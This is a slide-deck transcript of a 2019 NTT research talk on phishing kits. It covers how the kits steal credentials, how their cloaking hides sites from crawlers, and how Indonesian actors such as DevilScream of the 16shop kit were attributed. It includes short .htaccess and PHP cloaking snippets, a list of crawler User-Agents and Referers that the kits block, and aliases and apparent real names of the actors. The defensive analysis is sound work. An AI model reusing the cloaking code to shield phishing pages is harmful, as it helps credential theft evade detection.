Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phishing Website and Actor

16 views

Published on

Phishing, an old and traditional attack, is still a thing.
Hundreds of phishing website are launched every day and it threats people around the world. Anti-Phishing Working Group (APWG) says that APWG detected 150,000+ phishing websites for the 3rd quarter of 2018.

Sometimes phishing actors make OPSEC failures and, thanks to that, researchers can obtain a phishing kit (a kit to deploy a phishing website).
We have collected 18,000+ phishing kits based on OSINT and analyzed mechanisms of phishing websites and phishing actors themselves.

In this presentation, we will show the following findings.
- How to collect phishing kits based on OSINT data.
- Analysis of phishing actors:
- Who develops a phishing kit, How to distribute it, etc.
- Including a methodology to find out a phishing actor based on information (email, username and signature) inside a phishing kit.
- We will show an analysis of Indonesian phishing actors who target Asian countries.
- Especially focusing on an actor named DevilScream/Z1Coder who develops an infamous phishing kit“16shop”.

Finally, we will show countermeasures we have taken against phishing websites and actors.

Published in: Data & Analytics
  • Be the first to comment

  • Be the first to like this

Manabu Niseki, Hirokazu Kodera - Catch Phish If You Can: A Case Study of Phishing Website and Actor

  1. 1. Copyright©2019 NTT corp. All Rights Reserved. Catch Phish If You Can A Case Study of Phishing Website and Actor 2019.05.15 Hirokazu Kodera & Manabu Niseki Copyright(c)2019 NTT Corp. All Rights Reserved.
  2. 2. 2Copyright©2019 NTT corp. All Rights Reserved. • Manabu Niseki: • Researcher, NTT Secure Platform Laboratories • NTT-CERT • FIRST TC Bali 2018 & Internet Week 2018 speaker • Hirokazu Kodera: • Researcher, NTT Secure Platform Laboratories Who Are We?
  3. 3. 3Copyright©2019 NTT corp. All Rights Reserved. THE STATE OF PHISHING
  4. 4. 4Copyright©2019 NTT corp. All Rights Reserved. The State of Phishing Source: http://docs.apwg.org/reports/apwg_trends_report_q4_2018.pdf/ APWG stats: 785,920 phishing sites in 2018
  5. 5. 5Copyright©2019 NTT corp. All Rights Reserved. How can we take countermeasures?
  6. 6. 6Copyright©2019 NTT corp. All Rights Reserved. 知己知彼 Know yourself, know your enemy 孫子兵法 / The Art of War
  7. 7. 7Copyright©2019 NTT corp. All Rights Reserved. HOW TO CATCH PHISHES
  8. 8. 8Copyright©2019 NTT corp. All Rights Reserved. • Phishing kit: • A kit to deploy a phishing website. • It is possible to analyze a phishing website by obtaining a phishing kit. How to Catch Phishes
  9. 9. 9Copyright©2019 NTT corp. All Rights Reserved. Phishing actors make an OPSEC fail. • e.g. paypal-support.big[.]com[.]my How to Catch Phishes
  10. 10. 10Copyright©2019 NTT corp. All Rights Reserved. Phishing kit collecting methods: 1. Subscribing & generating feeds 2. Enumerating phishy URLs 3. Crawling the phishy URLs • An open directory website enables to download a phishing kit. How to Catch Phishes Phishing Kits Subscribe feeds • OpenPhish • PhishTank Generate feeds • CT logs • New domains Phishy URLs
  11. 11. 11Copyright©2019 NTT corp. All Rights Reserved. INSIDE PHISHING KITS: HOW TO STEAL CREDENTIALS
  12. 12. 12Copyright©2019 NTT corp. All Rights Reserved. How phishing kits steal credentials? • Two major ways: • Writing credentials to a local file. • Sending credentials to an actor’s email address. Inside Phishing Kits
  13. 13. 13Copyright©2019 NTT corp. All Rights Reserved. Inside Phishing Kits Writing credentials to lolo.txt
  14. 14. 14Copyright©2019 NTT corp. All Rights Reserved. Inside Phishing Kits Sending credentials to myloginbox@protonmail.com
  15. 15. 15Copyright©2019 NTT corp. All Rights Reserved. Stats of email providers abused by actors Inside Phishing Kits 0 500 1000 1500 2000 2500 3000 3500 4000 mail.ru aol.com zoho.com protonmail.com mail.com outlook.com hotmail.com yandex.com yahoo.com gmail.com count
  16. 16. 16Copyright©2019 NTT corp. All Rights Reserved. INSIDE PHISHING KITS: HOW TO CLOAK
  17. 17. 17Copyright©2019 NTT corp. All Rights Reserved. • Some of phishing sites include a cloaking function. • Implemented with .htaccess and PHP • Cloaking targets: • IP address • User-Agent • HTTP Referer Cloaking Function of Phishing Kits Phishing site User Crawler A Normal user can access to the phishing site, while a crawler can’t access to it.
  18. 18. 18Copyright©2019 NTT corp. All Rights Reserved. • Implementation example with .htaccess and PHP Cloaking Function of Phishing Kits RewriteEngine on RewriteCond %{HTTP_REFERER} example¥.com [NC,OR] RewriteCond %{HTTP_REFERER} www¥.example¥.com RewriteRule ^.* - [F,L] RewriteEngine on order allow,deny deny from 192.0.2.0/24 deny from 198.51.100.0/24 deny from example.com deny from env=stealthed allow from all Implementation example with .htaccess Access with Referer example.com or www.example.com, then the access will be denied. <?php if(strops(_$SERVER[‘HTTP_USER_AGENT’],’crawler’) or strops(_$SERVER[‘HTTP_USER_AGENT’],’bot’) ){ header(‘HTTP/1.0 404 Not Found’); exit; } ?> Implementation example with PHP Accessed with User-Agent crawler or bot, then the access will be denied.
  19. 19. 19Copyright©2019 NTT corp. All Rights Reserved. • How to analyze a cloaking function in a phishing kit? 1. Deploy a phishing kit on the Web server in the closed environment. 2. Send HTTP requests with multiple conditions of HTTP header to a phishing kit. • User-Agent and Referer 3. Observe HTTP responses from a phishing kit. Dynamic Analysis Against Phishing Kits Analysis tool Phishing kit deployed on Web server User-Agent: testbot User-Agent: Bot HTTP/1.1 200 OK HTTP/1.1 403 Forbidden User-Agent Referer Closed environment
  20. 20. 20Copyright©2019 NTT corp. All Rights Reserved. • About 12.9% of phishing kits have a cloaking function against User-Agent or Referer. • Analyzed phishing kits: 4,917 • Include cloaking function: 636 • Not include cloaking function: 4,281 • Respond “403 Forbidden”, “404 Not Found”. • Redirect to a legitimate site or a search engine. Dynamic Analysis Against Phishing Kits 12.9 % 87.1 % No Cloaking Function Cloaking Fucntion Redirect to Phishing Target google.com Dropbox, Apple yahoo.com PayPal www.linkedin.com LinkedIn www.paypal.com PayPal www.gov.uk UK Revenue Customs Agency www.asb.co.nz ASB Bank Summary of redirection to legitimate sites.Ratio of cloaking function Redirect to search engines Redirect to legitimate sites
  21. 21. 21Copyright©2019 NTT corp. All Rights Reserved. • It is identifiable whether a phishing kit has a cloaking function or not by sending 13 patterns of HTTP request. • Analyzed 636 phishing kits which includes cloaking function. • 86.6% of phishing kits block a HTTP request with "Surfbot" User-Agent. • The result indicates a connection of phishing actors. The cloaking techniques may be shared with phishing actors. Dynamic Analysis Against Phishing Kits HTTP Header Parameter User-Agent Surfbot Referer spamcop.net User-Agent imo-google-robot-intelink User-Agent AdsBot-Google Referer http://http://safebrowsing- cache.google.com/ User-Agent ASPSeek User-Agent HSFT - LVU Scanner HTTP Header Parameter Referer altavista.com Referer google.com.ar User-Agent CoolBot User-Agent DISCo Pump 3.2 User-Agent NetZip Downloader User-Agent tor-exit
  22. 22. 22Copyright©2019 NTT corp. All Rights Reserved. • How to check whether a phishing site has a cloaking function? 1. Access to a phishing site with HTTP header patterns analyzed in the previous step. 2. Observe HTTP response from a phishing site. Phishing Sites Including Cloaking Function Analysis Tool Phishing Site A GET http://example.jp/phishing.php User-Agent: Surfbot GET http://example.com/fake.php User-Agent: Surfbot HTTP/1.1 403 Forbidden HTTP/1.1 200 OK 1. User-Agent: Surfbot 2. Referer: spamcop.net 13. User-Agent: tor-exit HTTP Header Patterns GET http://example.com/fake.php Referer: spamcop.net HTTP/1.1 200 OK GET http://example.com/fake.php User-Agent: tor-exit HTTP/1.1 200 OK Phishing Site B Phishing Site A has cloaking function Phishing Site B doesn’t have cloaking function
  23. 23. 23Copyright©2019 NTT corp. All Rights Reserved. • 10.4% of phishing sites have a cloaking function. • The number of accessed phishing site URLs: 4,901 • Some phishing sites may be not enable access control implemented with .htaccess. Phishing Sites Including Cloaking Function 10.4 % 89.6 % No Cloaking Function Cloaking Fucntion Ratio of cloaking function Analysis Tool Phishing Kit which have cloaking func. User-Agent: testbot User-Agent: testbot HTTP/1.1 403 Forbidden HTTP/1.1 200 OK Closed Environment Phishing Site Phishing site doesn’t deny access though same phishing kit has cloaking function Download Kit
  24. 24. 24Copyright©2019 NTT corp. All Rights Reserved. • Some phishing kits have a cloaking function which makes analysis more difficult • IP address which connected to a phishing site is added to .htaccess file dynamically. • Access to the same phishing site again, the second access is redirected to legitimate site. Characteristic Cloaking Function Redirect the second connection to PayPal. • We need to care the cloaking function when researching phishing sites.
  25. 25. 25Copyright©2019 NTT corp. All Rights Reserved. WHO DID IT?
  26. 26. 26Copyright©2019 NTT corp. All Rights Reserved. Signature / Credits Analysis Th3 Exploiter
  27. 27. 27Copyright©2019 NTT corp. All Rights Reserved. Signature / Credits Analysis Ak47-VbV
  28. 28. 28Copyright©2019 NTT corp. All Rights Reserved. Signature / Credits Analysis Shadow Z118
  29. 29. 29Copyright©2019 NTT corp. All Rights Reserved. • Signature / credits analysis makes possible to trace out phishing actors. • OSINT techniques: • Username check: • Check User Names, Knowem, Pipl • Domain and IP research: • RiskIQ, SecurityTrails, VirusTotal • Googling Signature / Credits Analysis
  30. 30. 30Copyright©2019 NTT corp. All Rights Reserved. • Indonesian phishing actors: • RSJKINGDOM (a.k.a DarkLight) • DevilScream (a.k.a Z1coder) • Spammer ID • Others: • Hijaiyh(a.k.a justalinko), IDHAAM69, Indonesian Darknet and more. Chasing Indonesian Actors
  31. 31. 31Copyright©2019 NTT corp. All Rights Reserved. CHASING INDONESIAN ACTORS: RSJKINGDOM
  32. 32. 32Copyright©2019 NTT corp. All Rights Reserved. • RSJKINGDOM: • A developer of phishing kits targeting PayPal & Apple RSJKINGDOM
  33. 33. 33Copyright©2019 NTT corp. All Rights Reserved. RSJKINGDOM RSJKINGDOM DarkLight
  34. 34. 34Copyright©2019 NTT corp. All Rights Reserved. RSJKINGDOM
  35. 35. 35Copyright©2019 NTT corp. All Rights Reserved. RSJKINGDOM
  36. 36. 36Copyright©2019 NTT corp. All Rights Reserved. RSJKINGDOM
  37. 37. 37Copyright©2019 NTT corp. All Rights Reserved. CHASING INDONESIAN ACTORS: DEVILSCREAM
  38. 38. 38Copyright©2019 NTT corp. All Rights Reserved. • DevilScream: • A developer of an infamous phishing kit “16shop”. DevilScream
  39. 39. 39Copyright©2019 NTT corp. All Rights Reserved. DevilScream Riswanda devilscream Z1coder
  40. 40. 40Copyright©2019 NTT corp. All Rights Reserved. DevilScream Total: 768 domains (2019/03)
  41. 41. 41Copyright©2019 NTT corp. All Rights Reserved. • GitHub as a C2 (since 16shop v2) DevilScream
  42. 42. 42Copyright©2019 NTT corp. All Rights Reserved. • Attribution by Phishing AI: DevilScream Source: https://twitter.com/PhishingAi/status/1011688773610979328/
  43. 43. 43Copyright©2019 NTT corp. All Rights Reserved. CHASING INDONESIAN ACTORS: SPAMMER ID
  44. 44. 44Copyright©2019 NTT corp. All Rights Reserved. Spammer ID RSJKINGDOM’s profile picture on Kongknow
  45. 45. 45Copyright©2019 NTT corp. All Rights Reserved. Spammer ID
  46. 46. 46Copyright©2019 NTT corp. All Rights Reserved. • Spammer ID runs various services: • arakatestore[.]com • HTML to PDF Converter • Encrypt text with HTML Hidden Characters • carder[.]io • BIN checker • spmr[.]us • URL shortener • spammer[.]me • OCR reader, Priv8 tools and etc. Spammer ID
  47. 47. 47Copyright©2019 NTT corp. All Rights Reserved. COUNTERMEASURES WE’VE TAKEN
  48. 48. 48Copyright©2019 NTT corp. All Rights Reserved. • Reporting phishing websites: • To Google Safe Browsing • To hosting providers • Sharing a repot with LEAs & CSIRT/CERTs. Countermeasures We’ve Taken
  49. 49. 49Copyright©2019 NTT corp. All Rights Reserved. CONCLUSIONS
  50. 50. 50Copyright©2019 NTT corp. All Rights Reserved. • You can get phishing kits by leveraging OSINT. • The cloaking function in phishing kits makes it difficult to analyze. • But you can bypass it by knowing how it works. • You can take practical countermeasures against phishing attacks by analyzing phishing kits. Conclusions
  51. 51. 51Copyright©2019 NTT corp. All Rights Reserved. ANY QUESTIONS?
  52. 52. 52Copyright©2019 NTT corp. All Rights Reserved. • References: • DeepEnd Research: Indonesian Spam Communities • http://www.deependresearch.org/2018/09/indonesian- spam-communities.html • NetSecOps: Analysis of Phishing mail. Drone bought from Apple • http://netsecops.info/bought-a-drone-from-apple-really/ References

×